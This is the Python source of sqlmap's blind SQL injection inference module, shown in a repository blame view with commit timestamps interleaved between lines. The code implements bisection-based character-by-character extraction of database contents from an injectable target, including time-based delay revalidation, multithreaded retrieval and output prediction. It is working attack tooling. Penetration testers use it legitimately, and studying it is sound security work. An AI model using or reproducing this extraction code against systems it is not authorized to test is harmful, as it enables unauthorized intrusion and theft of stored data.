sqlmap/lib/techniques/blind/inference.py

530 lines
22 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
2011-07-08 00:10:03 +04:00
Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
import threading
import time
import traceback
2008-10-15 19:38:22 +04:00
from lib.core.agent import agent
from lib.core.common import Backend
2008-10-15 19:38:22 +04:00
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
2011-01-19 18:25:48 +03:00
from lib.core.common import decodeIntToUnicode
from lib.core.common import filterControlChars
from lib.core.common import getCharset
2010-05-27 20:45:09 +04:00
from lib.core.common import goGoodSamaritan
from lib.core.common import getPartRun
2010-10-23 12:05:24 +04:00
from lib.core.common import popValue
from lib.core.common import pushValue
2008-10-15 19:38:22 +04:00
from lib.core.common import replaceNewlineTabs
2010-01-15 19:06:59 +03:00
from lib.core.common import safeStringFormat
2011-06-08 18:35:23 +04:00
from lib.core.common import singleTimeWarnMessage
2011-02-03 16:28:10 +03:00
from lib.core.common import unhandledExceptionMessage
from lib.core.convert import safecharencode
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
2010-12-08 16:04:48 +03:00
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapConnectionException
2008-10-15 19:38:22 +04:00
from lib.core.exception import sqlmapValueException
from lib.core.exception import sqlmapThreadException
2008-10-15 19:38:22 +04:00
from lib.core.progress import ProgressBar
2010-12-10 14:32:46 +03:00
from lib.core.settings import CHAR_INFERENCE_MARK
from lib.core.settings import INFERENCE_BLANK_BREAK
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import PYVERSION
2011-07-03 02:48:56 +04:00
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
2008-10-15 19:38:22 +04:00
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
2010-02-04 20:45:56 +03:00
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
2008-10-15 19:38:22 +04:00
"""
Bisection algorithm that can be used to perform blind SQL injection
on an affected host
"""
partialValue = ""
2010-05-27 20:45:09 +04:00
finalValue = ""
asciiTbl = getCharset(charsetType)
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
2010-05-27 20:45:09 +04:00
# Set kb.partRun in case "common prediction" feature (a.k.a. "good
# samaritan") is used
kb.partRun = getPartRun() if conf.predictOutput else None
if "LENGTH(" in expression or "LEN(" in expression:
firstChar = 0
elif dump and conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit() ) ):
firstChar = int(conf.firstChar) - 1
elif firstChar is None:
firstChar = 0
elif ( isinstance(firstChar, basestring) and firstChar.isdigit() ) or isinstance(firstChar, int):
firstChar = int(firstChar) - 1
if "LENGTH(" in expression or "LEN(" in expression:
lastChar = 0
elif dump and conf.lastChar is not None and ( isinstance(conf.lastChar, int) or ( isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit() ) ):
lastChar = int(conf.lastChar)
elif lastChar in ( None, "0" ):
lastChar = 0
elif ( isinstance(lastChar, basestring) and lastChar.isdigit() ) or isinstance(lastChar, int):
lastChar = int(lastChar)
if Backend.getDbms():
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced)
2008-10-15 19:38:22 +04:00
else:
expressionUnescaped = unescaper.unescape(expression)
2008-10-15 19:38:22 +04:00
if length and not isinstance(length, int) and length.isdigit():
length = int(length)
if length == 0:
return 0, ""
if lastChar > 0 and length > ( lastChar - firstChar ):
length = ( lastChar - firstChar )
2011-04-30 17:20:05 +04:00
showEta = conf.eta and isinstance(length, int)
2008-10-15 19:38:22 +04:00
numThreads = min(conf.threads, length)
if showEta:
progress = ProgressBar(maxValue=length)
progressTime = []
2011-10-28 15:11:55 +04:00
if timeBasedCompare and conf.threads > 1:
warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically"
singleTimeWarnMessage(warnMsg)
2010-10-14 19:28:54 +04:00
if numThreads > 1:
if not timeBasedCompare:
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
logger.debug(debugMsg)
else:
numThreads = 1
2010-03-12 17:48:33 +03:00
2011-05-27 12:30:52 +04:00
if conf.threads == 1 and not timeBasedCompare:
warnMsg = "running in a single-thread mode. Please consider "
warnMsg += "usage of --threads switch for faster data retrieval"
2011-06-08 18:35:23 +04:00
singleTimeWarnMessage(warnMsg)
2011-05-27 12:30:52 +04:00
if conf.verbose in (1, 2) and not showEta:
2008-10-15 19:38:22 +04:00
if isinstance(length, int) and conf.threads > 1:
2010-03-12 15:46:26 +03:00
dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
2008-10-15 19:38:22 +04:00
dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
else:
dataToStdout("[%s] [INFO] retrieved: " % time.strftime("%X"))
2010-05-27 20:45:09 +04:00
queriesCount = [0] # As list to deal with nested scoping rules
hintlock = threading.Lock()
def tryHint(idx):
hintlock.acquire()
hintValue = kb.hintValue
hintlock.release()
if hintValue is not None and len(hintValue) >= idx:
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2):
posValue = hintValue[idx-1]
else:
posValue = ord(hintValue[idx-1])
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
2010-05-27 20:45:09 +04:00
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result:
return hintValue[idx-1]
hintlock.acquire()
kb.hintValue = None
hintlock.release()
return None
def validateChar(idx, value):
"""
2011-02-01 01:51:14 +03:00
Used in time-based inference (in case that original and retrieved
value are not equal there will be a deliberate delay).
"""
2011-02-01 01:51:14 +03:00
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value))
queriesCount[0] += 1
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
return not result
2012-01-05 14:55:58 +04:00
def getChar(idx, charTbl=asciiTbl, continuousOrder=True, expand=charsetType is None, shiftTable=None):
"""
continuousOrder means that distance between each two neighbour's
numerical values is exactly 1
"""
2010-12-10 14:32:46 +03:00
result = tryHint(idx)
if result:
return result
2010-12-11 13:22:18 +03:00
originalTbl = list(charTbl)
2012-01-05 14:55:58 +04:00
if continuousOrder and shiftTable is None:
# Used for gradual expanding into unicode charspace
shiftTable = [5, 4]
if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl:
charTbl.remove(ord('\n'))
if len(charTbl) == 1:
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0]))
2010-05-27 20:45:09 +04:00
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result:
2011-03-24 23:10:40 +03:00
return decodeIntToUnicode(charTbl[0])
else:
return None
maxChar = maxValue = charTbl[-1]
2010-05-28 14:01:19 +04:00
minChar = minValue = charTbl[0]
2008-10-15 19:38:22 +04:00
while len(charTbl) != 1:
2010-05-27 20:45:09 +04:00
position = (len(charTbl) >> 1)
posValue = charTbl[position]
2010-12-10 14:32:46 +03:00
if CHAR_INFERENCE_MARK not in payload:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
else:
2011-01-24 15:00:16 +03:00
# e.g.: ... > '%c' -> ... > ORD(..)
markingValue = "'%s'" % CHAR_INFERENCE_MARK
2011-03-24 23:10:40 +03:00
unescapedCharValue = unescaper.unescape(markingValue % decodeIntToUnicode(posValue))
2011-01-24 15:00:16 +03:00
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
2010-05-27 20:45:09 +04:00
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
2010-05-13 15:17:24 +04:00
if result:
minValue = posValue
if type(charTbl) != xrange:
charTbl = charTbl[position:]
else:
# xrange() - extended virtual charset used for memory/space optimization
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
2010-05-13 15:17:24 +04:00
else:
maxValue = posValue
if type(charTbl) != xrange:
charTbl = charTbl[:position]
2010-06-02 19:18:33 +04:00
else:
2010-05-24 13:28:20 +04:00
charTbl = xrange(charTbl[0], charTbl[position])
2008-10-15 19:38:22 +04:00
if len(charTbl) == 1:
2010-05-28 14:50:54 +04:00
if continuousOrder:
2010-05-28 14:01:19 +04:00
if maxValue == 1:
return None
# Going beyond the original charset
elif minValue == maxChar:
# If the original charTbl was [0,..,127] new one
# will be [128,..,128*16-1] or from 128 to 2047
2010-06-17 17:27:43 +04:00
# and instead of making a HUGE list with all the
# elements we use a xrange, which is a virtual
# list
2010-06-10 19:03:08 +04:00
if expand and shiftTable:
charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop())
originalTbl = list(charTbl)
maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0]
else:
return None
2010-05-28 14:01:19 +04:00
else:
retVal = minValue + 1
2011-02-01 01:51:14 +03:00
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
2011-01-31 19:22:55 +03:00
if timeBasedCompare and not validateChar(idx, retVal):
if not kb.originalTimeDelay:
kb.originalTimeDelay = conf.timeSec
2011-11-22 19:06:51 +04:00
if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS:
errMsg = "invalid character detected. retrying.."
logger.error(errMsg)
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.warn(warnMsg)
2011-11-22 19:06:51 +04:00
conf.timeSec += 1
if kb.adjustTimeDelay:
dbgMsg = "turning off auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = False
2012-01-05 14:55:58 +04:00
return getChar(idx, originalTbl, continuousOrder, expand, shiftTable)
else:
2011-11-22 19:06:51 +04:00
errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal)
logger.error(errMsg)
conf.timeSec = kb.originalTimeDelay
return decodeIntToUnicode(retVal)
else:
2011-03-24 23:10:40 +03:00
return decodeIntToUnicode(retVal)
2010-12-11 13:22:18 +03:00
else:
return None
else:
2010-05-28 14:01:19 +04:00
if minValue == maxChar or maxValue == minChar:
return None
# If we are working with non-continuous elements, set
# both minValue and character afterwards are possible
# candidates
for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result:
2011-03-24 23:10:40 +03:00
return decodeIntToUnicode(retVal)
return None
2010-02-04 20:45:56 +03:00
2008-10-15 19:38:22 +04:00
def etaProgressUpdate(charTime, index):
if len(progressTime) <= ( (length * 3) / 100 ):
eta = 0
else:
midTime = sum(progressTime) / len(progressTime)
midTimeWithLatest = (midTime + charTime) / 2
eta = midTimeWithLatest * (length - index) / conf.threads
progressTime.append(charTime)
progress.update(index)
progress.draw(eta)
2010-02-04 20:45:56 +03:00
# Go multi-threading (--threads > 1)
2008-10-15 19:38:22 +04:00
if conf.threads > 1 and isinstance(length, int) and length > 1:
2011-07-03 02:48:56 +04:00
value = []
threadData = getCurrentThreadData()
threadData.shared.value = [ None ] * length
threadData.shared.index = [ firstChar ] # As list for python nested function scoping
try:
def blindThread():
threadData = getCurrentThreadData()
2010-12-20 21:56:06 +03:00
while kb.threadContinue:
2011-12-28 20:27:17 +04:00
kb.locks.index.acquire()
2008-10-15 19:38:22 +04:00
2011-07-03 02:48:56 +04:00
if threadData.shared.index[0] >= length:
2011-12-28 20:27:17 +04:00
kb.locks.index.release()
2008-10-15 19:38:22 +04:00
return
2008-10-15 19:38:22 +04:00
2011-07-03 02:48:56 +04:00
threadData.shared.index[0] += 1
curidx = threadData.shared.index[0]
2011-12-28 20:27:17 +04:00
kb.locks.index.release()
2008-10-15 19:38:22 +04:00
2010-12-20 21:56:06 +03:00
if kb.threadContinue:
charStart = time.time()
2010-05-27 20:45:09 +04:00
val = getChar(curidx)
if val is None:
val = INFERENCE_UNKNOWN_CHAR
else:
break
2008-10-15 19:38:22 +04:00
2011-12-28 20:27:17 +04:00
kb.locks.value.acquire()
2011-07-03 02:48:56 +04:00
threadData.shared.value[curidx-1] = val
currentValue = list(threadData.shared.value)
2011-12-28 20:27:17 +04:00
kb.locks.value.release()
2010-12-20 21:56:06 +03:00
if kb.threadContinue:
if showEta:
2011-07-03 02:48:56 +04:00
etaProgressUpdate(time.time() - charStart, threadData.shared.index[0])
elif conf.verbose >= 1:
2010-03-12 15:38:19 +03:00
startCharIndex = 0
endCharIndex = 0
2010-03-25 19:26:50 +03:00
2010-03-12 15:38:19 +03:00
for i in xrange(length):
if currentValue[i] is not None:
2010-03-12 15:38:19 +03:00
endCharIndex = max(endCharIndex, i)
2010-03-25 19:26:50 +03:00
2010-03-12 15:38:19 +03:00
output = ''
2010-03-25 19:26:50 +03:00
2010-03-12 15:46:26 +03:00
if endCharIndex > conf.progressWidth:
startCharIndex = endCharIndex - conf.progressWidth
2010-03-25 19:26:50 +03:00
2010-03-12 15:38:19 +03:00
count = 0
2010-03-25 19:26:50 +03:00
for i in xrange(startCharIndex, endCharIndex + 1):
output += '_' if currentValue[i] is None else currentValue[i]
2010-03-12 15:38:19 +03:00
for i in xrange(length):
count += 1 if currentValue[i] is not None else 0
2010-03-12 15:38:19 +03:00
if startCharIndex > 0:
2010-03-12 17:31:14 +03:00
output = '..' + output[2:]
2010-04-19 19:25:52 +04:00
if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length-1):
2010-03-12 17:31:14 +03:00
output = output[:-2] + '..'
2011-01-12 00:46:21 +03:00
if conf.verbose in (1, 2) and not showEta:
output += '_' * (min(length, conf.progressWidth) - len(output))
status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%')
output += status if count != length else " "*len(status)
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output)))
2010-12-20 21:56:06 +03:00
if not kb.threadContinue:
if int(threading.currentThread().getName()) == numThreads - 1:
partialValue = unicode()
2011-07-03 02:48:56 +04:00
for v in threadData.shared.value:
2010-07-19 13:06:19 +04:00
if v is None:
break
elif isinstance(v, basestring):
partialValue += v
if len(partialValue) > 0:
dataToSessionFile(replaceNewlineTabs(partialValue))
2011-07-03 02:48:56 +04:00
runThreads(numThreads, blindThread, startThreadMsg=False)
except KeyboardInterrupt:
raise
2010-03-11 14:20:52 +03:00
2011-07-03 02:48:56 +04:00
finally:
value = threadData.shared.value
infoMsg = None
2010-05-27 20:45:09 +04:00
# If we have got one single character not correctly fetched it
# can mean that the connection to the target url was lost
if None in value:
for v in value:
if isinstance(v, basestring) and v is not None:
partialValue += v
2008-10-15 19:38:22 +04:00
if partialValue:
finalValue = partialValue
infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue))
else:
finalValue = "".join(value)
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue))
2008-10-15 19:38:22 +04:00
if isinstance(finalValue, basestring) and len(finalValue) > 0:
dataToSessionFile(replaceNewlineTabs(finalValue))
2008-10-15 19:38:22 +04:00
if conf.verbose in (1, 2) and not showEta and infoMsg:
dataToStdout(infoMsg)
2008-10-15 19:38:22 +04:00
# No multi-threading (--threads = 1)
2008-10-15 19:38:22 +04:00
else:
index = firstChar
2008-10-15 19:38:22 +04:00
while True:
2010-05-27 20:45:09 +04:00
index += 1
2008-10-15 19:38:22 +04:00
charStart = time.time()
2010-05-21 13:35:36 +04:00
2010-05-27 20:45:09 +04:00
# Common prediction feature (a.k.a. "good samaritan")
# NOTE: to be used only when multi-threading is not set for
# the moment
if conf.predictOutput and len(finalValue) > 0 and kb.partRun is not None:
2010-05-25 18:51:02 +04:00
val = None
commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(finalValue, asciiTbl)
# If there is one single output in common-outputs, check
# it via equal against the query output
if commonValue is not None:
# One-shot query containing equals commonValue
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
2010-10-25 18:11:47 +04:00
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
query = agent.suffixQuery(query)
2010-05-27 20:45:09 +04:00
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
2010-05-27 20:45:09 +04:00
# Did we have luck?
if result:
dataToSessionFile(replaceNewlineTabs(commonValue[index-1:]))
2010-05-27 20:45:09 +04:00
if showEta:
etaProgressUpdate(time.time() - charStart, len(commonValue))
elif conf.verbose in (1, 2):
dataToStdout(commonValue[index-1:])
2010-05-27 20:45:09 +04:00
finalValue = commonValue
2010-05-27 20:45:09 +04:00
break
# If there is a common pattern starting with finalValue,
# check it via equal against the substring-query output
if commonPattern is not None:
# Substring-query containing equals commonPattern
subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
2010-10-25 18:11:47 +04:00
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.suffixQuery(query)
queriesCount[0] += 1
2010-12-24 21:40:48 +03:00
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
# Did we have luck?
if result:
val = commonPattern[index-1:]
index += len(val)-1
# Otherwise if there is no commonValue (single match from
# txt/common-outputs.txt) and no commonPattern
# (common pattern) use the returned common charset only
# to retrieve the query output
if not val and commonCharset:
2010-05-27 20:45:09 +04:00
val = getChar(index, commonCharset, False)
# If we had no luck with commonValue and common charset,
2010-05-27 20:45:09 +04:00
# use the returned other charset
2010-05-21 13:35:36 +04:00
if not val:
2010-05-28 14:17:03 +04:00
val = getChar(index, otherCharset, otherCharset == asciiTbl)
2010-05-21 13:35:36 +04:00
else:
val = getChar(index, asciiTbl)
2008-10-15 19:38:22 +04:00
if val is None or ( lastChar > 0 and index > lastChar ):
2008-10-15 19:38:22 +04:00
break
if kb.data.processChar:
val = kb.data.processChar(val)
finalValue += val
dataToSessionFile(replaceNewlineTabs(val))
2008-10-15 19:38:22 +04:00
if showEta:
etaProgressUpdate(time.time() - charStart, index)
elif conf.verbose in (1, 2):
2008-10-15 19:38:22 +04:00
dataToStdout(val)
if len(finalValue) > INFERENCE_BLANK_BREAK and finalValue[-INFERENCE_BLANK_BREAK:].isspace():
break
if conf.verbose in (1, 2) or showEta:
2008-10-15 19:38:22 +04:00
dataToStdout("\n")
2010-05-11 18:15:03 +04:00
if ( conf.verbose in ( 1, 2 ) and showEta ) or conf.verbose >= 3:
infoMsg = "retrieved: %s" % filterControlChars(finalValue)
2008-10-15 19:38:22 +04:00
logger.info(infoMsg)
if not partialValue:
dataToSessionFile("]\n")
if kb.threadException:
2010-06-03 12:55:13 +04:00
raise sqlmapThreadException, "something unexpected happened inside the threads"
2008-10-15 19:38:22 +04:00
return queriesCount[0], safecharencode(finalValue) if kb.safeCharEncode else finalValue